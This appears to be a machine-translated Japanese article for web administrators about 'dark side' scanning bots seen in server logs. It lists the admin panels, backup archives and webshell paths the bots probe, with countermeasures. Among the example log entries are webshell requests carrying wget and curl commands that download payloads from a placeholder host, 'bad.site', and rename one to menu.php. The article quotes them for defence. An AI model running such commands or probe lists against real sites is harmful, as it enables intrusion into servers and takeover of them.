「ダークサイドボット」とは何ですか? 攻撃者が使用するスキャンプログラム(検索ロボット、スパイダー)を示してみましょう。 検索エンジンロボット[1、2]とは異なり、「フォースの暗黒面のボット」(以下、略してボットと呼びます)は、脆弱性、悪意のあるソフトウェアのブックマーク、機密情報などを検索しています。ボットに似たアクションは、人々が、明らかな理由で、ボットの使用はより効率的でより一般的です。
いくつかのサイトのログ(Webサーバーおよびコンテンツ管理システム)を使用した資料の準備。 最も典型的で最も説明的な例が選択されます。
彼らは何を、そしてなぜ探しているのですか?
管理パネル
管理パネル、コントロールパネル、または「管理パネル」は、最も一般的な目標の1つです。 タスク:使用されるCMSを決定し、さらにパスワードを選択するためにパネルスクリプトの正確なアドレスを設定します。
例(CMS WordPress [3]の場合):
example.org/wp-login.php (額チェック)
example.org/wp-admin (サンプルディレクトリの整理)
example.org/dir/dir/wp-login.php (利用可能なすべてのディレクトリを反復します)
example.org/wp-admin/images/wordpress-logo.png (スクリプト自体はチェックされないが、特徴的な画像またはcssファイルの場合はスキャンをマスクしようとする)
このようなスキャンは絶えず実行されるため、特に上記の例のようにWordPress CMSを使用していない場合は、それほど気にする必要はありません。 対策として、使用するCMSの必須パスワードの強度を忘れずに、Webサーバー(Apacheの場合は.htaccessと.htpasswd)を使用して、管理パネルのスクリプトでディレクトリへのアクセスを制限することをお勧めします。
これらの例からわかるように、CMS管理パネルだけでなく、管理用の補助システムまたはアプリケーションも検索しようとしています。 最も一般的なバージョンのサフィックスを含む、さまざまなスクリプトおよびディレクトリ名のバリエーションがソートされます。 一部の管理者は、スクリプトまたはディレクトリの名前を(名前の読みやすさと明瞭さを維持しながら)変更することにより、ボットをしのいでシステムを保護できると考えています。 残念ながら、これは事実とはほど遠い。
注目のアーカイブ
バックアップまたはインストールパッケージを含むアーカイブは、管理パネルにアクセスするためのパスワード、設定を持つファイル、DBMSにアクセスするためのパラメーター、データベースの完全なコピーなどを含むことができるため、攻撃者にとって貴重な餌食です。
例:
example.org/example.org.tar.gzexample.org/backup.zipexample.org/example.org.zipexample.org/public_html.tar.gzexample.org/public_html.zipexample.org/www.zipexample.org/dir/dir.zip以下を含む多くのアーカイバーに注意してください ホスティング会社のサーバーにインストールされている場合は、アーカイブされるディレクトリまたはアーカイブ用のデータがあるディレクトリと同じアーカイブファイルのデフォルト名を設定します。 上記の例からわかるように、この機能はボットで広く使用されています。
一般的なバックアップシステムからアーカイブファイル名を選択しようとする場合があります。 ファイル名の生成とリリース日の更新に一般的なアルゴリズムを使用すると、組み合わせの数が大幅に削減されます。 一部のバックアップシステムには保護メカニズムが組み込まれているという事実(「すべてからの拒否」を伴う.htaccessなど)にもかかわらず、Webサーバーを変更する場合やその他の理由で効果がない場合があります。
常にボットの関心領域にあるため、重要な情報または機密情報を含むアーカイブを含むファイルをすばやく削除することをお勧めします。
トラップ
ログの分析中に疑わしい呼び出しが識別された場合、管理者は状況をよりよく理解したいと考えています。 これは、攻撃者がガイドするものです。
通常、ログからHTTPリファラーフィールドの値を復元できます。 クライアント(ボット)はこのフィールドを任意に設定できるため、管理者は受信したデータを処理する際に注意を払う必要があります。 可能なオプション:フィッシングサイトまたはマルウェアのあるサイトへのリンク、広告リンク、リンク削減システムによって圧縮されたスクリプトの実行。
HTTPリファラーフィールドの値を信頼できる情報と見なさないことをお勧めします。リンクをクリックする場合は、最初にウイルス対策会社とVirusTotoalのサイトのリンクを確認してください。
誰もがこれを知って理解する必要がありますが、特に管理者権限を持つサーバーで作業している場合は、不明なリンクをクリックすることは厳禁です。
明らかな理由により、リンクの例は提供されません。
「マジック」カタログ
ボットが最も頻繁に使用するディレクトリ(サブセクション)は何ですか? 相対的な頻度のみに焦点を当て、追加のコメントなしで例を示します。 選択は、調査対象のサイトと、管理パネルの検索に使用されるディレクトリの包含(除外)に依存することにすぐ注意してください。
悪意のあるソフトウェアのブックマーク
まず、例を考えてみましょう。
example.org/explore.phpexample.org/images/join.phpexample.org/images/register.phpexample.org/images/signup.phpexample.org/images/stories/busuk.inc.phpexample.org/images/webadmin.phpexample.org/libraries/libraries.phpexample.org/stories/food.phpexample.org/tmp/petx.phpexample.org/xmlrpc.php上記のファイルは、[research]サイトには存在しないはずです。 複数のサイトから十分に大きなサンプルがある場合は、そのようなターゲットの試みを強調できます。 攻撃者によるこのようなスクリプトの使用を示す追加の例に注意してください。
example.org/images/do.php?act=regexample.org/images/stories/racrew.php?cmd=wget http://bad.site/img/icons/tempe.gif; mv tempe.gif menu.php
example.org/naskleng.php?cmd=wget http://bad.site/components/com_content/teli.tar.gz; curl -O http://bad.site/components/com_content/teli.tar.gz; lwp-download http://bad.site .....
彼らはどこから来たのですか? 原則として、すべてが平凡です:ワレズまたはハッキング(時代遅れであり、CMSやコンポーネントなどで更新されていません)。
エイジレスクラシック-SQLインジェクションとディレクトリナビゲーション
私たちは、著者が意図したとおり、それがどうあるべきか、どのように機能するかについての詳細な推論なしに、例に限定しています。
結論の代わりに
(ウェブだけでなく)オペレーティングシステムのログを監視および分析します。 これは、最も不適切な瞬間に役立つ場合があります。
宿題 [Homebrew]日曜大工のwebハニーポット 。